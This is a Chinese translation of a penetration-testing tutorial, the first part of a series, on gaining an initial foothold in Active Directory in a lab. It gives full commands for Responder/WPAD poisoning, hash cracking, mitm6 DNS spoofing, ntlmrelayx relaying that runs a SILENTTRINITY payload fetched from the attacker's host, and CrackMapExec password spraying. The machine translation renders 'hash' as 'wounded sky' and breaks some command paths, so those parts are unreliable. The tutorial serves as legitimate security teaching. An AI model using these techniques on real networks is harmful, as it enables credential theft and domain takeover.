在渗透测试之前,许多客户对自己网络的安全性充满信心。原因很简单。漏洞扫描结果显示,未发现严重漏洞。因此,在很多情况下,不到15分钟,我们就利用AD中的配置错误获得了域管理员权限。
在我看来,在渗透测试的教育中,关于活动目录(AD)的解释相当匮乏。不幸的是,OSCP没有教授AD渗透测试,甚至SANS GPEN课程也很少涉及这一领域。本系列文章的目标是在我们的工作中利用AD安全漏洞为读者详细介绍与渗透测试相关的技术、工具和方法。然而,由于经验和时间有限,我们很难涵盖一切。在本系列中,出于安全考虑,我们将使用Kali Linux2019通过虚拟机在虚拟域中完成相关操作。
首先我们明确一下目标:这里渗透测试的目标是识别所有潜在的攻击向量,因为对手会想尽一切办法入侵网络。
既然目标已经明确,接下来,我们将努力实现它。为此,我们应该遵循以下步骤,如下图所示。
信用:微软
简介:某客户聘请你对他的网络进行渗透测试,使用的是active directory。另外,你什么都没有:没有相关证件,不知道相关范围,甚至没有门禁卡。但是,你可以试着跟随身后的其他人,从而绕过门禁系统,用IP电话进入一个隐藏的房间。之后就可以拔下IP电话,插上笔记本电脑了。嗯,你终于可以上网了。接下来该怎么办?站稳了。
第一阶段:站稳脚跟。
因为没有证件,只能进行有限的侦察。记住,侦察几乎会贯穿整个周期的每一步。不过,不用太担心。接下来,我们将向读者介绍如何在互联网上站稳脚跟。首先,因为我们可以上网,所以我们可以通过ifconfig或ipconfig检查我们所在的子网。获取IP后,您可以使用nmap执行ping扫描,查看是否可以访问其他设备。
nmap -sn 192.168.1.1/24
如果设备有反应,它就会复活。如果您没有收到任何信息,可能是ICMP已被禁用,网络上没有其他设备,或者您无法与其他设备通信,因为您尚未通过身份验证,或者它可能被身份安全解决方案(如思科ISE)阻止。对于本文,假设我们已经收到了几台机器的响应,并且我们可以成功地ping通它们。
工具:响应者
接下来,我们将使用一个名为Responder的工具。对于使用Windows的读者,我们也可以使用Inveigh。这两个工具的目的是检查AD中常见的错误配置,从而找到执行WPAD并导致NBT-NS中毒的机会。默认情况下,当Windows系统使用互联网时,它将搜索网络代理自动发现文件。这种配置在组织中非常有用,因为设备需要发送广播来请求代理文件和接收相应的代理文件。同时,它没有对发送代理文件的用户进行身份验证,这为攻击者发送虚假响应提供了机会,以便他可以请求相关凭据。
在Kali系统中,默认情况下会安装Responder软件。
应答器
在Windows7机器上,打开Internet Explorer浏览器,导航到谷歌,然后搜索WPAD文件。在应答器中,我看到了相关的请求。事实上,响应者会自动用挑战来响应请求,这将导致受害者向受伤的天空发送他们的用户名和密码(NTLMv2格式)。
有了这个受伤的天空,我们可以尝试破解或者用ntlmrelay.py之类的工具进行中继,在之前的文章中,我介绍了如何转发NTLM的受伤天空,所以这里我就介绍一下如何破解密码的受伤天空,因为这种做法在工作中比较常见。
老实说,我很少在linux/kali机器上破解密码。这里用的是NVIDIA GPU,在Kali上安装驱动是个大麻烦。另外,对于Windows系统,可以使用HashCatGUI。这个软件很好用,所以在这里用。我把拍摄到的受伤天空放入一个名为“hash.txt”的文件中,试图通过一些词表/规则来破解,但是在这个例子中,我们直接用rockyou.txt破解了,幸运的是,不到一秒钟就成功破解了。
我的哈希表设置。
e79d7c19a29af70?from=pc">破解出来的密码是“password!”
现在,我们已经成功破解了密码,也就是说,我们得到了下列登陆凭证:
wxddp:Password!
在继续介绍其他内容之前,我还想展示一些其他的破解方法,以防Responder无法正常破解。
工具:mitm6
假设客户的网络使用的是有效的WPAD PAC文件,而您的欺骗没有得逞。这时,还有一种技术,可以利用IPv6和DNS将凭证中继到目标。在默认情况下,IPv6协议是处于启用状态的,并且实际上其优先级会大于IPv4协议,这意味着,如果计算机上有IPv6 DNS服务器的话,它会优先使用IPv6服务器,而不是IPv4服务器。另外,默认情况下,Windows计算机会通过DHCPv6请求来查找IPv6 DNS服务器,如果使用伪造的IPv6 DNS服务器进行欺骗,则可以有效地控制设备查询DNS的方式。更多相关的信息,请参见此处。
首先,请下载mitm6。
git clone https://github.com/fox-it/mitm6.git cd mitm6 pip install然后,使用它来检测目标网络工作组。由于之前进行了ping扫描,因此,也会收到NetBIOS的名称,这里显示的目标域是lab.local。
在运行mitm6之前,目标系统的IP设置如下所示:
请注意这里的DNS服务器
然后,运行mitm6:
mitm6 -d lab.local
现在,请注意DNS服务器的变化:
请注意,这个IPv6地址就是DNS服务器的地址。
现在,真正的问题在于,Windows会优先使用IPv6协议,而不是IPv4协议,这就意味着,我现在可以控制DNS服务了。
由于可以通过伪造WPAD应答来控制了DNS,所以,也可以使用ntlmrelayx.py脚本来完成相关的工作。具体配置,请参考这里的介绍。
让mitm6在一个窗口中运行,然后,打开另一个窗口,并运行ntlmrelayx.py脚本。
ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i -wh:托管WPAD文件的服务器(攻击者的IP) -t:目标系统 -i:打开一个交互式shell从现在开始,我们就可以通过netcat连接到shell了,就好像我们获得了一个完全交互的SMB shell一样,此外,我们还可以通过-c(命令)开关来发送Empire stager。实际上,我们的选择范围,主要限制于ntlmrelayx.py所提供的功能。就本例来说,我使用-c命令来执行SILENTTRINITY payload。关于如何使用SILENTTRINITY的介绍,请参考这篇文章。
ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.50/ --no-smb-server -c 'C:Windowshttp://Microsoft.NETfr amework64v3.5msbuild.exe 192.168.218.129SMBmsbuild.xml'
但是,在这个例子中,msbuild.exe并没有构建xm l文件,并且也没有回连SILENTTRINITY,实际上,这些都太容易了。相反,我检查自己的SMB服务器,并发现了中继的受伤的天空。
然后,将其破解。
现在,我们无需借助Responder就能成功获得相应的网络凭证了。
工具:CrackMapExec
实际上,对于渗透测试人员来说,CrackMapExec简直就是一把瑞士军刀:从密码喷射到受伤的天空传递再到命令执行,它简直无所不能。
即使其他方法都失败了,我们还可以尝试密码喷射。这个方法之所以最后才用,是因为密码锁定的缘故。实际上,密码锁定并没有您想象的那么常见,因此,攻击者可以针对特定的用户名使用字典攻击。为此,首先要获取用户名,这个任务可以通过OSINT和theharvester来完成。如果还是没有获得相应的用户名,还可以为CrackMapExec(CME)提供一个用户名表,但是为了节约时间,假设这里的用户名为rsmith。
如果您使用的是Kali系统,并且版本较高的话,则应该已经预装了CrackMapExec软件;否则的话,可以通过下列命令进行安装:
apt-get install crackmapexec
由于我们在扫描过程中识别出了网络上的设备,因此,我们可以向CME提供与用户名配对的密码列表并尝试登录。
crackmapexec smb 192.168.218.40 -d lab.local -u rsmith -p ~/Documents/wordlists/fasttrack.txt --shares
几秒钟后,密码就找到了。
密码找到了!
由此来看,季节:年份这种形式,的确是一个非常受欢迎的密码组合。
利用找到的这些凭证,我们就能以常规用户的身份,继续进行下一篇文章中介绍的权限提升测试。
本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://nosec.org/home/detail/2344.html
原文:https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
白帽汇从事信息安全,专注于安全大数据、企业威胁情报。
公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。
为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。